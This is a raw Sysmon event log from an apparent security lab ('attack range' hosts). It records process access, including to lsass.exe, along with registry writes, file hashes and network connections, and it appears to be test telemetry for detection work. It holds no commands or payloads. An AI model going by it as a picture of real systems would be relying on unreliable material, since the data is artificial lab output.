Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.713{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000015365Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:52.651{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C660A08B5907604272E3C4E88A5D01E,SHA256=DA3ABACEFCE938F239A0BD45EBC6803A05E199CCA6FF20A370F784A6BC6C1EBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:52.243{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 13241300x800000000000000040093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:52.129{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000040092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:52.113{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ECF03A32-103D-11D2-854D-006008059367} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000040091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:52.101{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000040090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:52.096{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000040089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:52.041{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x800000000000000040088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:52.018{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFFBinary Data 23542300x800000000000000015366Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:53.757{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AFDD2260AD07EF3C036FE684E7B21D6,SHA256=41B16C87818E3A08E8C774F9F3245F06C9A22C718789A4C4D17D837FA197C0AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.559{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56235-false72.21.91.29-80http 354300x800000000000000040096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:51.549{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57463- 23542300x800000000000000040095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:52.999{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8954849E40AF09C1BAC42BECE3528D75,SHA256=9879AFA4FDAB81840F9348BE421C9E27149614AA9AD143240B5FFF2F01A24AF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015367Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:54.844{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BB200F5CB65EFB8A7648E6B2FF0BE7,SHA256=0D592DD9D832FED9212B39DAEBBD853AAECEFA44F229A72CDF289A389ED735C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.989{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.935{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.906{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.905{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.905{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.898{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.893{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EF05-00000000AF02}5628C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.5351_none_7f0b8fbe21ea4a21\TiWorker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EE05-00000000AF02}3480C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000040127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program 